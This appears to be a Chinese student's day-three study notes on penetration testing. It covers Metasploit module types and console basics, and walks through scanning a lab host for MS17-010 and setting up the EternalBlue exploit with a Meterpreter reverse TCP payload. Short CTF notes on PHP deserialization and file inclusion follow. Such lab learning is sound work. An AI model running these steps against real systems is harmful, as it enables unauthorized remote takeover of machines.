DAY3:
MSF
基本模块
- Auxiliary 辅助模块-为渗透测试信息搜集提供了大量的辅助模块支持;
- Exploits 攻击模块-利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件;
- Payload 攻击载荷模块-攻击成功后促使靶机运行的一段植入代码;
- Post 后渗透攻击模块-收集更多信息或进一步访问被利用的目标系统;
- Encoders 编码模块-将攻击载荷进行编码,来绕过防护软件拦截。
基本运行
-
开启数据库:service postgresql start
-
初始化msf数据库:msfdb.init
-
开启MSF:msfconsole
-
查看数据链接状态:db_status
图片可知:已选择postgresql,没有连接。
-
可直接输入help/?,查看帮助菜单
简单的帮助指令:
help/? 帮助菜单
exit 退出msf
Back 返回
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 选择使用模块
sessions 查看会话
基本流程
- 扫描靶机
use auxiliary/scanner/smb/smb_ms17_010
输入后,可以输入info,查看模块信息。
info
查看需要设置的选项:
show options
设置rhosts
set rhosts 192.168.221.129
再进行扫描一下
exploit
如果有一个小绿色[+],则发现它是一个可以被进攻的目标。它会显示window版本等。
由上图可知:
msf5辅助(scanner/smb/smb_ms17_010)>利用漏洞
192.168.221.129:445-已扫描1台主机(100%完成)
辅助模块执行完成。
辅助模块执行完成后,进入攻击模块。
所以先放回back.
然后输入:
search type:exploit name:ms17
先看 rank为yes的,选定第一个,
选定exploit/windows/smb/ms17_010_eternalblue,输入这个:
use exploit/windows/smb/ms17_010_eternalblue
再进行info查看该模块信息,
再查看需要设置的options,输入options,在输入set rhosts 192.168.221.129,类似于上个模块的操作。
然后,再收取会话。输入:show payloads
由此可知,对方是windows7。
然后,设置会话,set payload windows/x64/meterpreter/reverse_tcp
,然后再options,是为了让payload设置监听
设置完成后,运行,run/exploit,得到会话。
由上可知:
[-]处理程序无法绑定到192.168.221.135:4444:–
[]已在0.0.0.0:4444上启动反向TCP处理程序
[-]192.168.221.129:445-攻击因失败而中止:不易受攻击:将ForceExploit设置为override
[]攻击已完成,但未创建会话。
如果攻击成功,则会在末尾,发出“==== win ====”标志。
做题
- 题目:unserialize3
在这里插入图片描述
自己的思路:由题目可知,这是个有关于序列化的问题。
用到的知识点:反序列化、wakeup函数、code参数
解题步骤:
先增加一个对象的属性个数进行绕过;然后在编辑php输出序列化字符串,输出得出。
发现,有差别,
payload后:
得到flag:
2. 题目:Web_php_include
题目中:文件include搜索字符串在另一个字符串中是否存在
用到strstr(),str_replace()以其它字符替换字符串中的一些字符
,data伪协议代码执行.
输入到网页里,然后网页弹出
,
再输入进网页,然后,点击查看器。